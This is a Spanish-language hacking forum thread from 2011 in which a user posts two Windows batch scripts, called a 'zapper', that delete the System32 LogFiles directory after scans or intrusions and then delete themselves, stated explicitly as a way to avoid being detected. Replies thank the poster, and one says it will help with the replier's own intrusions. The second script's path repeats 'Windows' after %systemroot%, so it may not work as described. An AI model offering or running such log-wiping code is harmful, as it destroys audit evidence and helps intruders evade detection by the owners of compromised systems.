Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: ANTRAX en Diciembre 02, 2011, 11:45:11 AM

Título: Zapper para Windows [Batch]
Publicado por: ANTRAX en Diciembre 02, 2011, 11:45:11 AM
Cada vez que scanneamos, hacemos una intrusion, un ping  una pc o una ip, esta deja un registro en C:\Windows\System32\LogFiles
Los Zappers sirven para borrar esos registros o logs y asi que no se sospeche o no tengan formas de descubrirnos.

Mirando un poco el codigo de Panzer de IH. Decidi modificarlo un poco, ya que note que en Windows 7 no funcionaria.
Su Codigo es el siguiente:

@echo off
pushd %systemroot%\system32\logfiles
del /f /q *.evt
del /f /q *.log
exit


Lo que hace es dirigirse al directorio de logfiles y borrar todos los *.evt y *.log que hay en ella. Pero note que en Windows 7, crea directorios y dentro de estos directorio, archivos con extensiones *.txt, *.evl entre otras...

He optado por modificar un poco el codigo:

@echo off
rd /s /q %systemroot%\Windows\System32\LogFiles
md %systemroot%\Windows\System32\LogFiles
del /f /q %0
exit


Lo que hace este codigo es eliminar la carpeta LogFiles con todo su arbol (Directorios y Archivos) y la vuelve a crear vacia. Despues de hacer estas dos cosas, se autoelimina el zapper para evitar ser detectado.
Título: Re:Zapper para Windows [Batch]
Publicado por: P1P38 en Diciembre 02, 2011, 03:16:10 PM
Que bien... muy buen aporte Antrax, lo probare.
Gracias.
Título: Re:Zapper para Windows [Batch]
Publicado por: Pr0ph3t en Diciembre 03, 2011, 02:46:00 PM
Gracias ANTRAX, me será útil.
Título: Re:Zapper para Windows [Batch]
Publicado por: k43l en Diciembre 04, 2011, 08:33:26 PM
Gracias antrax por este aporte, me servira mucho para mis intrusiones en windows seven
salu2
Título: Re:Zapper para Windows [Batch]
Publicado por: cerocool en Diciembre 07, 2011, 01:13:04 PM
Con extension lo guardo?, pregunta porque me estoy iniciando en esto
Título: Re:Zapper para Windows [Batch]
Publicado por: Pr0ph3t en Diciembre 07, 2011, 02:30:16 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Con extension lo guardo?, pregunta porque me estoy iniciando en esto
Sí, extensión .bat